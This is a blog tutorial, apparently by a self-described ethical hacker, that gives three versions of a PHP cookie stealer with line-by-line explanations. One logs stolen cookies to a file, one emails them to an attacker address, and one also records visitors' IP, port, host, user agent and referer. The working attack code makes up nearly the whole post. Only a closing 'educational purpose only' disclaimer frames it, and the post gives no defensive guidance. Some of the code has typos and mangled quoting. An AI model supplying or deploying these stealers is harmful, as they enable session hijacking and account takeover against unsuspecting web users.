How to create cookie stealer Coding in PHP?Mail System



Here is the simple Cookie Stealer code:
Cookie stored in File:
<?php
$cookie = $HTTP_GET_VARS[“cookie”];
$steal = fopen(“cookiefile.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?>


$cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.
$steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie.
fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file.
fclose($steal); close the opened file.
Another version: Sends cookies to the hacker mail 

<?php
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);
?>
The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”.
 Third Version

<?php
function GetIP()
{
    if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
        $ip = getenv(“HTTP_CLIENT_IP”);
    else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
        $ip = getenv(“HTTP_X_FORWARDED_FOR”);
    else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
        $ip = getenv(“REMOTE_ADDR”);
    else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
        $ip = $_SERVER[‘REMOTE_ADDR’];
    else
        $ip = “unknown”;
    return($ip);
}
function logData()
{
    $ipLog=”log.txt”;
    $cookie = $_SERVER[‘QUERY_STRING’];
    $register_globals = (bool) ini_get(‘register_gobals’);
    if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
    else $ip = GetIP();
    $rem_port = $_SERVER[‘REMOTE_PORT’];
    $user_agent = $_SERVER[‘HTTP_USER_AGENT’];
    $rqst_method = $_SERVER[‘METHOD’];
    $rem_host = $_SERVER[‘REMOTE_HOST’];
    $referer = $_SERVER[‘HTTP_REFERER’];
    $date=date (“l dS of F Y h:i:s A”);
    $log=fopen(“$ipLog”, “a+”);
    if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
        fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>”);
    else
        fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie nn”);
    fclose($log);
}
logData();
?>
  The above Cookie stealer will store the following information:
  • Ip address
  • port number
  • host(usually computer-name)
  • user agent
  • cookie
This Article is for Educational purpose only, written for Ethical Hackers. This article is for creating public awareness about the Internet Risks. 
 
SHARE

Dhirendra Biswal

Hi. I'm Dhirendra The Admin of this Blog I'm A Certified Ethical Hacker also a Web Developer With Programming Skills in various Programming Languages.

  • Image
  • Image
  • Image
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment